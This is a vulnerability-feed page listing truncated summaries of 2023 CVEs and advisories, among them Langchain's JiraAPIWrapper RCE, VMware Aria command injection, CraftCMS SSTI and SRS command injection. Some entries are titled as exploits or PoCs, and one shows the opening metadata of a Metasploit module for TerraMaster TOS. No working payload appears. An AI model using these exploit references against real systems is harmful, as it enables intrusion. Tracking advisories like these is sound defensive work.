Langchain OS Command Injection vulnerability

Langchain before v0.0.225 was discovered to contain a remote code execution RCE vulnerability in the component JiraAPIWrapper aka the JIRA API wrapper. This vulnerability allows attackers to execute arbitrary code via crafted input. As noted in the "releases/tag" reference, a fix is available...

CVE-2023-29337

CVE-2023-29337 is a Linux-specific vulnerability in NuGet Client (and related .NET tooling) describing a race condition that can enable a symlink attack and remote code execution when a victim opens specially crafted content. IBM/IBM RPA advisory confirms remote code execution possibilities via ....

CVE-2023-28310 Microsoft Exchange Server Remote Code Execution Vulnerability

...

Exploit for Command Injection in Vmware Aria_Operations_For_Networks

CVE-2023-20887 Exploit VMWare vRealize Network Insight Pre-Aut...

Microsoft fixes six critical vulnerabilities in June Patch Tuesday

Its that time of the month again: We're looking at June's Patch Tuesday roundup. Microsoft has released its monthly update, and compared to previous months, its actually not so bad. No actively exploited zero-days and only six critical vulnerabilities. So, well have the luxury of going over those...

CVE-2023-32017

Microsoft PostScript Printer Driver Remote Code Execution Vulnerability...

CVE-2023-34540

Langchain before v0.0.225 was discovered to contain a remote code execution RCE vulnerability in the component JiraAPIWrapper aka the JIRA API wrapper. This vulnerability allows attackers to execute arbitrary code via crafted input. As noted in the "releases/tag" reference, a fix is available...

CVE-2023-25367

CVE-2023-25367 affects Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS. The issue is unfiltered user input allowing Remote Code Execution via the SCPI interface or web server. Root cause: insufficient input validation and, in some sources, lack of authentication on the SCPI interface, enabling remot...

Microsoft Outlook 2013 Service Pack 1 RCE Vulnerability (KB5002382)

This host is missing an important security update according to Microsoft KB5002382 SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescriptio...

Remote Desktop Client for Windows RCE (June 2023)

The Windows Remote Desktop client for Windows installed on the remote host is missing security updates. It is, therefore, affected by a remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. Note that Nessus has not...

GHSA-3X74-V64J-QC3F Withdrawn Advisory: CraftCMS Server-Side Template Injection vulnerability

Withdrawn This advisory has been withdrawn because the CVE has been disputed and the underlying vulnerability is likely invalid. This link is maintained to preserve external references. According to maintainers of Craft CMS, only administrators can access Settings, and those administrators may ha...

Exploit for Command Injection in Vmware Aria_Operations_For_Networks

CVE-2023-20887 POC for CVE-2023-20887 VMWare Aria Operations f...

CVE-2023-30179

CraftCMS version 3.7.59 is vulnerable to Server-Side Template Injection SSTI. An authenticated attacker can inject Twig Template to User Photo Location field when setting User Photo Location in User Settings, lead to Remote Code Execution. NOTE: the vendor disputes this because only Administrator...

CVE-2023-30179

CraftCMS is affected by a Server-Side Template Injection (SSTI) in version 3.7.59, where an authenticated user can inject Twig templates into the User Photo Location in User Settings, potentially enabling Remote Code Execution. The root cause cited is lack of input validation for the Twig code in...

EulerOS Virtualization 3.0.6.0 : sysstat (EulerOS-SA-2023-2232)

According to the versions of the sysstat package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - sysstat is a set of system performance tools for the Linux operating system. On 32 bit systems, in versions 9.1.16 and newer but...

TerraMaster TOS 4.2.29 Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'digest/md5' require 'time' class MetasploitModule 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',...

Desktop APP RCE via saveDraft IPC

🔒️ Requirements The user must load a malicious project. 📝 Description In version 20.3.3 commit 5383c20e947fd772668316e407edc5d5db4850db, the shell=true option is added to a spawn execution. This is really dangerous has it allows a malicious user to execute commands even from attributes. Example: j...

CVE-2023-27997: Critical Fortinet Fortigate Remote Code Execution Vulnerability

On June 9, 2023, Fortinet silently patched a purported critical remote code execution RCE vulnerability in Fortigate SSL VPN firewalls. According to Lexfo Security’s Charles Fol, who discovered the vulnerability, the flaw is heap-based and reachable pre-authentication. According to reports,...

CVE-2023-34105 SRS has command injection vulnerability in demonstration api-server for HTTP callback.

SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's api-server server is vulnerable to a drive-by command injection. An attacker may send a request to the /api/v1/snapshots endpoint containing an...

CVE-2023-34105

SRS (Simple Real-time Server) api-server is vulnerable to drive-by command injection on POST /api/v1/snapshots in versions prior to 5.0.157, 5.0-b1, and 6.0.48, potentially leading to Remote Code Execution (RCE). Connected advisories confirm a fix in 5.0.157, 5.0-b1, and 6.0.48. Mitigate by updat...